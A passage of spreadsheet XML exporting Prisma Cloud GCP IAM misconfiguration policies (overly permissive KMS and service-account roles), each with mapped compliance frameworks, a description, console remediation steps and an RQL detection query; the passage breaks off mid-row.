ATT&amp;CK v14.0 Cloud IaaS for Enterprise, PCI DSS v4.0, MITRE ATT&amp;CK v12, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), CDC NIST 800-53 Rev4, PCI DSS v3.2.1, kashan ACSC Information Security Manual (ISM), Risk Management in Technology (RMiT), CIS Controls v8, MITRE ATT&amp;CK v6.3 [Deprecated], ISO 27001:2013, ISO/IEC 27002:2013, MITRE ATT&amp;CK v10.0 [Deprecated], SOC 2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CIS v3.0.0 (GCP) Level 2, SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS Controls v7.1, TX-RAMP Level 1, CSA CCM v.4.0.1, CIS v2.0.0 (GCP) Level 2, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27001:2022, NIST 800-53 Rev4, TX-RAMP Level 1, kfirdaus AWS Account-CS, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CSA CCM v.4.0.1, ISO/IEC 27001:2022, ISO 27001:2013, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), CIS v1.2.0 (GCP), CIS Controls v8.1, CCPA 2018, PIPEDA, CSA CCM v4.0.12, Demo_Daryl ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, CSA CCM v.4.0.1, NIST 800-53 Rev 5, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Brazilian Data Protection Law (LGPD), MITRE ATT&amp;CK v6.3 [Deprecated], Brazilian Data Protection Law (LGPD), PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2936" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2936" s="2" t="inlineStr"/>
      <c r="D2936" t="inlineStr"/>
      <c r="E2936" t="inlineStr"/>
      <c r="F2936" t="inlineStr"/>
      <c r="G2936" t="b">
        <v>1</v>
      </c>
      <c r="H29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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2936" t="inlineStr">
        <is>
          <t>gcloud-projects</t>
        </is>
      </c>
      <c r="K2936" t="inlineStr">
        <is>
          <t>GCP IAM user have overly permissive Cloud KMS roles</t>
        </is>
      </c>
      <c r="L2936" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M2936" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2936" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2936" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2936" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2936" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2936" t="inlineStr">
        <is>
          <t>ISM-1648</t>
        </is>
      </c>
      <c r="S2936" t="inlineStr"/>
      <c r="T2936" t="b">
        <v>0</v>
      </c>
      <c r="U2936" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2936" t="inlineStr">
        <is>
          <t>gcloud-projects-get-iam-user</t>
        </is>
      </c>
      <c r="W2936" t="inlineStr">
        <is>
          <t>This policy identifies IAM users who have overly permissive Cloud KMS roles. Built-in/Predefined IAM role Cloud KMS Admin allows the user to create, delete, and manage service accounts. Built-in/Predefined IAM role Cloud KMS CryptoKey Encrypter/Decrypter allows the user to encrypt and decrypt data at rest using the encryption keys. It is recommended to follow the principle of 'Separation of Duties' ensuring that one individual does not have all the necessary permissions to be able to complete a malicious action.</t>
        </is>
      </c>
      <c r="X2936" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to IAM &amp; Admin (Left Panel)
3. Select IAM
4. From the list of users, choose the reported IAM user
5. Click on Edit permissions pencil icon
6. For member having 'Cloud KMS Admin' and any of the 'Cloud KMS CryptoKey Encrypter/Decrypter', 'Cloud KMS CryptoKey Encrypter', 'Cloud KMS CryptoKey Decrypter' or any CryptoKey roles granted/assigned, Click on the Delete Bin icon to remove the role from a member</t>
        </is>
      </c>
      <c r="Y2936" t="inlineStr"/>
      <c r="Z2936" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-projects-get-iam-user' AND json.rule = 'roles[*] contains roles/cloudkms.admin and roles[*] contains roles/cloudkms.crypto'</t>
        </is>
      </c>
      <c r="AA2936" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2936" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2936" t="inlineStr">
        <is>
          <t>PC-GCP-RM-194</t>
        </is>
      </c>
      <c r="AD2936" t="b">
        <v>1</v>
      </c>
      <c r="AE2936" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2936" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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6" t="inlineStr">
        <is>
          <t>d01c2b9c-38ec-403f-a56f-d80b3f2df46b</t>
        </is>
      </c>
      <c r="AI2936" t="inlineStr">
        <is>
          <t>51e04de1-21b9-4674-8f6a-a4c076c19de3</t>
        </is>
      </c>
      <c r="AJ2936" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2936" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2937">
      <c r="A2937" t="inlineStr">
        <is>
          <t>ISO 27001:2013, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, ISO/IEC 27001:2022, CIS v2.0.0 (GCP) Level 2, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, APRA (CPS 234) Information Security, HIPAA, Matt's ATT&amp;ACK, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Demo_Daryl ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, Microsoft Cloud Security Benchmark v1, New Zealand Information Security Manual (NZISM v3.4), Fedramp (Moderate), MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO 27002:2022, NIST 800-53 Rev 5, CIS Controls v8.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-172, MITRE ATT&amp;CK v6.3 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO 27001:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v1.3.0 (GCP), HITRUST CSF v.11.2.0, NIST SP 800-171 Revision 3, ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, TX-RAMP Level 2, HIPAA, ITSG-33, DORA, CIS Controls v8.1, ISO/IEC 27018:2019, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, APRA (CPS 234) Information Security, Insurance Regulatory And Development Authority Of India, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27017:2015, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, MITRE ATT&amp;CK v8.2 [Deprecated], Sarbanes Oxley Act (SOX), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, PCI DSS v4.0, MITRE ATT&amp;CK v12, Secure Controls Framework (SCF) - 2024.2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Sarbanes Oxley Act (SOX), CDC NIST 800-53 Rev4, PCI DSS v3.2.1, NIST CSF v2.0, CIS Controls v8, MITRE ATT&amp;CK v6.3 [Deprecated], CIS v1.2.0 (GCP), Copy of New Zealand Information Security Manual (NZISM v3.4), ISO 27001:2013, ISO/IEC 27002:2013, CIS v1.1.0 (GCP), MITRE ATT&amp;CK v10.0 [Deprecated], SOC 2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, SOC 2, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], Rehan, APRA (CPS 234) Information Security, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST CSF v2.0, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27001:2022, NIST 800-53 Rev4, TX-RAMP Level 1, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, ISO 27001:2013, ISO/IEC 27002:2013, CIS Controls v8.1, CIS v1.0.0 (GCP), CCPA 2018, PIPEDA, CSA CCM v4.0.12, Demo_Daryl ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CSA CCM v.4.0.1, CIS v3.0.0 (GCP) Level 2, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CIS Controls v7.1, ISO/IEC 27002:2013, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Brazilian Data Protection Law (LGPD), MITRE ATT&amp;CK v6.3 [Deprecated], Brazilian Data Protection Law (LGPD), PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2937" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2937" s="2" t="inlineStr"/>
      <c r="D2937" t="inlineStr"/>
      <c r="E2937" t="inlineStr"/>
      <c r="F2937" t="inlineStr"/>
      <c r="G2937" t="b">
        <v>1</v>
      </c>
      <c r="H29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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2937" t="inlineStr">
        <is>
          <t>gcloud-projects</t>
        </is>
      </c>
      <c r="K2937" t="inlineStr">
        <is>
          <t>GCP IAM Users have overly permissive service account privileges</t>
        </is>
      </c>
      <c r="L2937" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2937" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2937" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2937" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2937" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2937" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2937" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2937" t="inlineStr"/>
      <c r="T2937" t="b">
        <v>0</v>
      </c>
      <c r="U2937" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2937" t="inlineStr">
        <is>
          <t>gcloud-projects-get-iam-user</t>
        </is>
      </c>
      <c r="W2937" t="inlineStr">
        <is>
          <t>This policy identifies IAM users which have overly permissive service account privileges. Any user should not have Service Account Admin and Service Account User, both roles assigned at a time. Built-in/Predefined IAM role Service Account admin allows the user to create, delete, manage service accounts. Built-in/Predefined IAM role Service Account User allows the user to assign service accounts to Apps/Compute Instances. It is recommended to follow the principle of 'Separation of Duties' ensuring that one individual does not have all the necessary permissions to be able to complete a malicious action or meant to help avoid security or privacy incidents and errors.</t>
        </is>
      </c>
      <c r="X2937" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to IAM &amp; Admin (Left Panel)
3. Select IAM
4. From the list of users, choose the reported IAM user
5. Click on Edit permissions pencil icon
6. For member having 'Service Account admin' and 'Service Account User' roles granted/assigned, Click on the Delete Bin icon to remove the role from a member</t>
        </is>
      </c>
      <c r="Y2937" t="inlineStr"/>
      <c r="Z2937" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-projects-get-iam-user' AND json.rule = '(roles[*] contains roles/iam.serviceAccountAdmin) and (roles[*] contains roles/iam.serviceAccountUser)'</t>
        </is>
      </c>
      <c r="AA2937" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2937" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2937" t="inlineStr">
        <is>
          <t>PC-GCP-RM-202</t>
        </is>
      </c>
      <c r="AD2937" t="b">
        <v>1</v>
      </c>
      <c r="AE2937" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2937" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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7" t="inlineStr">
        <is>
          <t>ea8c6cf3-5592-49c7-8832-e13102043d15</t>
        </is>
      </c>
      <c r="AI2937" t="inlineStr">
        <is>
          <t>f1dd78f2-7667-4b69-8a3e-af257e5d4cf6</t>
        </is>
      </c>
      <c r="AJ2937" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2937" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2938">
      <c r="A2938" t="inlineStr">
        <is>
          <t>ISO 27001:2013, ISO/IEC 27001:2022, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, HITRUST CSF v9.3 [Deprecated], ISO 27001:2013, APRA (CPS 234) Information Security, NIST 800-53 Rev4, HIPAA, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, Matt's ATT&amp;ACK, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CSA CCM v3.0.1, Demo_Daryl ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, Rehan, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, CSA CCM v3.0.1, Fedramp (Moderate), ISO 27002:2022, CDC NIST 800-53 Rev4, CSA CCM v3.0.1, Microsoft Cloud Security Benchmark v1, CSA CCM v3.0.1, MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, NIST 800-53 Rev4, CSA CCM v3.0.1, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, CSA CCM v3.0.1, ISO 27002:2022, CDC NIST 800-53 Rev4, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-172, Telecommunications Security Act - TSA, MITRE ATT&amp;CK v6.3 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO 27001:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v.11.2.0, NIST SP 800-171 Revision 3, ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, TX-RAMP Level 2, SOC 2, ITSG-33, CIS v1.0.0 (GCP), CIS Controls v8.1, ISO/IEC 27018:2019, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, APRA (CPS 234) Information Security, Insurance Regulatory And Development Authority Of India, Australian Energy Sector Cyber Security Framework (AESCSF), CIS v3.0.0 (GCP) Level 1, SOC 2, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 2, MITRE ATT&amp;CK v8.2 [Deprecated], NIST 800-53 Rev 5, Sarbanes Oxley Act (SOX), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, PCI DSS v4.0, MITRE ATT&amp;CK v12, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), PCI DSS v3.2.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CIS v1.1.0 (GCP), CIS Controls v8, MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v3.0.1, ISO 27001:2013, ISO/IEC 27002:2013, NIST 800-53 Rev 5, MITRE ATT&amp;CK v10.0 [Deprecated], SOC 2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v3.0.1, CSA CCM v3.0.1, NIST CSF v2.0, CIS v1.3.0 (GCP), TX-RAMP Level 1, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, SOC 2, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, ISO 27001:2013, ISO/IEC 27002:2013, CIS v1.2.0 (GCP), CCPA 2018, PIPEDA, NIST 800-53 Rev4, CSA CCM v4.0.12, Demo_Daryl ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CSA CCM v.4.0.1, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CIS Controls v7.1, ISO/IEC 27002:2013, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Brazilian Data Protection Law (LGPD), MITRE ATT&amp;CK v6.3 [Deprecated], Brazilian Data Protection Law (LGPD), CDC NIST 800-53 Rev4, CIS v2.0.0 (GCP) Level 1</t>
        </is>
      </c>
      <c r="B2938" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2938" s="2" t="inlineStr"/>
      <c r="D2938" t="inlineStr"/>
      <c r="E2938" t="inlineStr"/>
      <c r="F2938" t="inlineStr"/>
      <c r="G2938" t="b">
        <v>1</v>
      </c>
      <c r="H29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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2938" t="inlineStr">
        <is>
          <t>gcloud-projects</t>
        </is>
      </c>
      <c r="K2938" t="inlineStr">
        <is>
          <t>GCP IAM user with service account privileges</t>
        </is>
      </c>
      <c r="L2938" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M2938" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2938" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2938" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2938" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2938" t="inlineStr">
        <is>
          <t>AC-1</t>
        </is>
      </c>
      <c r="R2938" t="inlineStr">
        <is>
          <t>AC-6 (5)</t>
        </is>
      </c>
      <c r="S2938" t="inlineStr"/>
      <c r="T2938" t="b">
        <v>0</v>
      </c>
      <c r="U2938" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2938" t="inlineStr">
        <is>
          <t>gcloud-projects-get-iam-user</t>
        </is>
      </c>
      <c r="W2938" t="inlineStr">
        <is>
          <t>Checks to ensure that IAM users don't have service account privileges. Adding any user as service account actor will enable these users to have service account privileges. Adding only authorized corporate IAM users as service account actors will make sure that your information is secure.</t>
        </is>
      </c>
      <c r="X2938" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to IAM &amp; Admin (Left Panel)
3. Select IAM 
4. From the list of users, identify the users with Service Account Actor, Service Account User or Service Account Token Creator roles
5. Remove these user roles by clicking on Delete icon for any unauthorized user</t>
        </is>
      </c>
      <c r="Y2938" t="inlineStr"/>
      <c r="Z2938" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-projects-get-iam-user' AND json.rule = '(roles[*] contains roles/iam.serviceAccountActor) or (roles[*] contains roles/iam.serviceAccountUser) or (roles[*] contains roles/iam.serviceAccountTokenCreator)'</t>
        </is>
      </c>
      <c r="AA2938" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2938" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2938" t="inlineStr">
        <is>
          <t>PC-GCP-RM-130</t>
        </is>
      </c>
      <c r="AD2938" t="b">
        <v>1</v>
      </c>
      <c r="AE2938" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2938" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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8" t="inlineStr">
        <is>
          <t>89bef727-64c6-497c-810d-3689199e4350</t>
        </is>
      </c>
      <c r="AI2938" t="inlineStr">
        <is>
          <t>649717bf-564b-4c0b-98c2-4179c0fb3191</t>
        </is>
      </c>
      <c r="AJ2938" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2938" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2939">
      <c r="A2939" t="inlineStr">
        <is>
          <t>ISO 27001:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27001:2022, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO 27001:2013, APRA (CPS 234) Information Security, HIPAA, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, Matt's ATT&amp;ACK, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Demo_Daryl ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v1.0.0 (GCP), CIS Controls v8.1, ISO 27002:2022, Microsoft Cloud Security Benchmark v1, Fedramp (Moderate), MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO 27002:2022, NIST 800-53 Rev 5, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-172, MITRE ATT&amp;CK v6.3 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO 27001:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v.11.2.0, NIST SP 800-171 Revision 3, ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, ITSG-33, CIS Controls v8.1, ISO/IEC 27018:2019, kashan ACSC Information Security Manual (ISM), CIS v3.0.0 (GCP) Level 1, CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), CIS v1.3.0 (GCP), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, APRA (CPS 234) Information Security, Insurance Regulatory And Development Authority Of India, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 2, MITRE ATT&amp;CK v8.2 [Deprecated], Sarbanes Oxley Act (SOX), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, PCI DSS v4.0, Rehan, MITRE ATT&amp;CK v12, Sarbanes Oxley Act (SOX), CDC NIST 800-53 Rev4, PCI DSS v3.2.1, CIS v1.1.0 (GCP), Risk Management in Technology (RMiT), NIST CSF v2.0, CIS Controls v8, MITRE ATT&amp;CK v6.3 [Deprecated], ISO 27001:2013, ISO/IEC 27002:2013, CIS v1.2.0 (GCP), MITRE ATT&amp;CK v10.0 [Deprecated], TX-RAMP Level 2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27001:2022, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST CSF v2.0, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27001:2022, NIST 800-53 Rev4, ITSG-33, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, ISO 27001:2013, TX-RAMP Level 2, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, CSA CCM v4.0.12, Demo_Daryl ACSC Information Security Manual (ISM), CIS v2.0.0 (GCP) Level 1, kfirdaus AWS Account-CS, NIST 800-53 Rev 5, CSA CCM v.4.0.1, Brazilian Data Protection Law (LGPD), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CIS Controls v7.1, ISO/IEC 27002:2013, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), MITRE ATT&amp;CK v6.3 [Deprecated], NIST 800-53 Rev 5, PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2939" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2939" s="2" t="inlineStr"/>
      <c r="D2939" t="n">
        <v>0</v>
      </c>
      <c r="E2939" t="n">
        <v>61</v>
      </c>
      <c r="F2939" t="n">
        <v>0</v>
      </c>
      <c r="G2939" t="b">
        <v>1</v>
      </c>
      <c r="H29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39" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2939" t="inlineStr">
        <is>
          <t>gcloud-projects</t>
        </is>
      </c>
      <c r="K2939" t="inlineStr">
        <is>
          <t>GCP IAM Service account has admin privileges</t>
        </is>
      </c>
      <c r="L2939" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M2939" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2939" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2939" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2939" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2939" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2939" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2939" t="inlineStr"/>
      <c r="T2939" t="b">
        <v>0</v>
      </c>
      <c r="U2939" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2939" t="inlineStr">
        <is>
          <t>gcloud-projects-get-iam-user</t>
        </is>
      </c>
      <c r="W2939" t="inlineStr">
        <is>
          <t>This policy identifies service accounts which have admin privileges. Application uses the service account to make requests to the Google API of a service so that the users aren't directly involved. It is recommended not to use admin access for ServiceAccount.</t>
        </is>
      </c>
      <c r="X2939" t="inlineStr">
        <is>
          <t>1.Login to GCP Portal
2.Goto IAM &amp; admin (Left panel)
3.Choose the reported member and click on the edit icon
4.Delete the Admin role and provide appropriate role according to requirement.
5.Click Save</t>
        </is>
      </c>
      <c r="Y2939" t="inlineStr"/>
      <c r="Z2939" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-projects-get-iam-user' AND json.rule = user contains iam.gserviceaccount.com AND (roles[*] contains admin or roles[*] contains Admin or roles[*] contains roles/editor or roles[*] contains roles/owner)</t>
        </is>
      </c>
      <c r="AA2939" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2939" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2939" t="inlineStr">
        <is>
